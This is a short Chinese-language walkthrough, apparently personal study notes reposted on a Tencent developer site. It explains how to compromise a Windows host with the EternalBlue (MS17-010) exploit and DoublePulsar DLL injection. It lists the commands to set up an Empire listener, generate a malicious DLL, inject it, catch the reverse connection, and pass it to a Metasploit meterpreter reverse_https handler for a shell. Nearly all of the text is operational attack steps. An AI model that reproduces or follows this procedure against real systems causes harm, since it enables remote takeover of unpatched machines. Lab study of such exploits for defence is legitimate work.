首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

永恒之蓝配合ms17

准备

攻击机1:win xp

安装软件:python,pywin,永恒之蓝

修改永恒之蓝中的部分代码:

fb

注释第72行

Furrbunch

修改文件、日志路径

攻击机2:kail

需安装:Empire

切换路径

cd /Empire-1.6/setup

运行安装文件,连网安装

./install.sh

设置登陆密码

攻击机1使用永恒之蓝开始攻击

切换到路径,运行 fb

python fb.py

配置受害主机IP,攻击本机IP

使用永恒之蓝

use EternalBlue

选择受害主机系统,选择FB,其他默认输入Enter

出现下面界面攻击成功

kail创建监听进程及恶意dll文件

打开Empire

./reset.sh

创建监听进程,设置Name、Host、Port,list查看监听列表

生成DLL文件,设置受害主机位数

按上述路径找见生成的dll文件复制给攻击机1

攻击机1调用DoublePulsar并注入DLL

在攻击机1终端使用DoublePulsar

use DoublePulsar

协议选择SMB,选择32位,选择RunDLL

注入失败界面

成功界面

kail系统得到反弹链接

dll注入成功时,kail显示有反弹链接

获取注入dll的受害机列表

agents

并获取链接

interact 链接名字 sysinfo

并把模块转移到msf中

usemodule code_execution/invoke_shellcode

设置转移的主机IP,端口(msf中的)

打开msf中,使用模块

use exploit/multi/handler

设置反弹链接

set PAYLOAD windows/meterpreter/reverse_https

设置主机IP、端口

模块转移成功获取shell权限

简单生物 の 学习笔记

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190804A08MNY00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券